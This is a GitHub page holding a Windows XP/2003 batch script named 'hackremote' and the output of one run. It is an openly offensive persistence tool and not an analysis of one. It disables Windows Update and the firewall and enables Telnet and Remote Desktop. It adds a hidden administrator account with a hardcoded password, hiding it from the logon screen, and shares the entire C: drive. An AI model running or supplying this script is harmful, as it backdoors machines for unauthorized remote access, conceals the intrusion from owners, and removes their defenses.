-
Notifications
You must be signed in to change notification settings - Fork 84
/
Copy pathhackremote_script
86 lines (63 loc) · 2.36 KB
/
hackremote_script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
---------------------------------
SCRIPTS hackeremote.bat XP/W2k3
---------------------------------
@echo off
REM ****************
REM Disable off "AUTO UPDATE"
REM ****************
sc config wuauserv start= disabled
net stop wuauserv
REM ****************
REM Disable windows xp Firewall
REM ****************
netsh firewall set opmode disable
REM netsh advfirewall firewall set opmode disable
REM ****************
REM Enable TELNET
REM ****************
sc config tlntsvr start= auto
net start telnet
REM ****************
REM Enable Remote Desktop
REM ****************
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
REM ***************
REM Create a HIDDEN USER usr= remotehackbyksanchez, pass= 1234
REM ***************
REM net user remotehackedbyksanchez 1234 /add :: Windows XP Weak Password
net user hackedbyksanchez P22W0rd1234 /add
net localgroup "Administrators" /add hackedbyksanchez
net localgroup "Users" /del hackedbyksanchez
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hackedbyksanchez /t REG_DWORD /d 0 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /f
REM ***************
REM ENABLE A SHARED FOLDER
REM ***************
net share DataShare=c:\ /remark:"HACKED BY KSANCHEZ"
---------------
OUTPUT SCRIPT
---------------
E:\>hackremote.bat
hackremote.bat
[SC] ChangeServiceConfig SUCCESS
The Windows Update service is stopping.
The Windows Update service was stopped successfully.
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .
Ok.
[SC] OpenService FAILED 1060:
The specified service does not exist as an installed service.
The service name is invalid.
More help is available by typing NET HELPMSG 2185.
The operation completed successfully.
The account already exists.
More help is available by typing NET HELPMSG 2224.
System error 1378 has occurred.
The specified account name is already a member of the group.
The command completed successfully.
The operation completed successfully.
The operation completed successfully.